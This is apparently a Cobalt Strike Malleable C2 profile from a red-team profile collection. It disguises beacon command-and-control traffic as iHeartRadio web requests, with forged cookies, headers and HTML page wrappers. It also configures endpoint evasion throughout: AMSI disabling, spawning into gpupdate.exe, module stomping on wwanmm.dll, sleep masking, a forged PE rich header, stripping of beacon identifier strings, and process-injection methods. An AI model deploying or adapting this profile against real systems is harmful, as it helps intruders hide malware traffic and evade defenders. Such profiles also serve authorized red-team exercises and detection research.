Malleable-C2-Profiles/normal/iheartradio.profile

287 lines
15 KiB
Plaintext
Raw Permalink Normal View History

2017-07-12 17:41:58 +00:00
#iheartradio
#chose a popular top 40 station 'hit-nation'..
#xx0hcd
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
set dns_idle "8.8.8.8";
set maxdns "235";
2019-05-10 15:06:21 +00:00
#custom cert
#https-certificate {
# set keystore "your_store_file.store";
# set password "your_store_pass";
#}
http-config {
# set headers "Server, Content-Type, Cache-Control, Connection";
# header "Content-Type" "text/html;charset=UTF-8";
# header "Connection" "close";
# header "Cache-Control" "max-age=2";
# header "Server" "nginx";
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "false";
}
2017-07-12 17:41:58 +00:00
http-get {
set uri "/live/hit-nation-4222/";
client {
header "Host" "www.iheart.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
metadata {
base64url;
prepend "GED_PLAYLIST_ACTIVITY=";
prepend "_gads=ID=53c4a:S=ALNI_M32;";
prepend "uid=1492;";
prepend "pid=3913;";
prepend "ihr_c=US;id=HdqX;";
header "Cookie";
}
}
server {
header "Content-Type" "text/html; charset=utf-8";
header "Edge-Control" "cache-maxage=3600";
header "Server" "nginx/1.4.6 (Ubuntu)";
header "X-Powered-By" "Express";
header "Access-Control-Allow-Origin" "*";
header "Accept-Ranges" "bytes";
header "Via" "1.1 varnish";
header "Age" "315";
header "Connection" "close";
header "X-Served-By" "cache-dfw1822-DFW";
header "X-Cache" "HIT";
header "X-Cache-Hits" "1";
header "X-Timer" "S1499866924.089752,VS0,VE1";
output {
base64url;
prepend "<!DOCTYPE html>
<html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
<head>
<title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
<meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
<link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today&#x27;s Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 &amp; Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 &amp; Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
<style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";
append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 &amp; Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today&#x27;s Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
<link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
</div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
<div id='jw-wrapper' class='hidden'>
<div id='jw-player'></div>
</div>
<div id='ads-wrapper' class='hidden'>
<a id='ads-learn-more' target='_blank'>Learn More</a>
<div id='ads-player'></div>
</div>
<script src=/a/locale/?rel=7.33.1></script>
<script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
<script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
</body>
</html>";
print;
}
}
}
http-post {
set uri "/Live/hit-nation-4222/";
set verb "GET";
client {
header "Host" "www.iheart.com";
header "Accept" "*/*";
output {
base64url;
prepend "GED_PLAYLIST_ACTIVITY=";
prepend "_gads=ID=53c4a:S=ALNI_M32;";
prepend "uid=1492;";
prepend "pid=3913;";
prepend "ihr_c=US;id=HdqX;";
header "Cookie";
}
id {
base64url;
parameter "autoplay";
}
}
server {
header "Content-Type" "text/html; charset=utf-8";
header "Edge-Control" "cache-maxage=3600";
header "Server" "nginx/1.4.6 (Ubuntu)";
header "X-Powered-By" "Express";
header "Access-Control-Allow-Origin" "*";
header "Accept-Ranges" "bytes";
header "Via" "1.1 varnish";
header "Age" "315";
header "Connection" "close";
header "X-Served-By" "cache-dfw1822-DFW";
header "X-Cache" "HIT";
header "X-Cache-Hits" "1";
header "X-Timer" "S1499866924.089752,VS0,VE1";
#just keeping output together for responses
output {
base64;
prepend "<!DOCTYPE html>
<html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
<head>
<title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
<meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
<link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today&#x27;s Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 &amp; Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 &amp; Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
<style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";
append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 &amp; Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today&#x27;s Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
<link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
</div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
<div id='jw-wrapper' class='hidden'>
<div id='jw-player'></div>
</div>
<div id='ads-wrapper' class='hidden'>
<a id='ads-learn-more' target='_blank'>Learn More</a>
<div id='ads-player'></div>
</div>
<script src=/a/locale/?rel=7.33.1></script>
<script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
<script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
</body>
</html>";
print;
}
}
}
http-stager {
2019-05-10 15:06:21 +00:00
set uri_x86 "/Console";
set uri_x64 "/console";
client{
header "Host" "www.iheart.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
}
2017-07-12 17:41:58 +00:00
server {
header "Server" "nginx/1.4.6 (Ubuntu)";
header "Content-Type" "text/html; charset=utf-8";
header "Connection" "close";
}
}
2019-05-10 15:06:21 +00:00
###Malleable PE Options###
post-ex {
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
2017-07-12 17:41:58 +00:00
stage {
2019-05-10 15:06:21 +00:00
set checksum "0";
set compile_time "25 Oct 2016 01:57:23";
set entry_point "170000";
#set image_size_x86 "6586368";
#set image_size_x64 "6586368";
#set name "WWanMM.dll";
set userwx "false";
set cleanup "true";
set sleep_mask "true";
set stomppe "true";
set obfuscate "true";
set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
#obfuscate beacon before sleep.
set sleep_mask "true";
#module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll";
#transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.dll" "";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
}
}
process-inject {
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread;
CreateRemoteThread;
RtlCreateUserThread;
}
2017-07-12 17:41:58 +00:00
}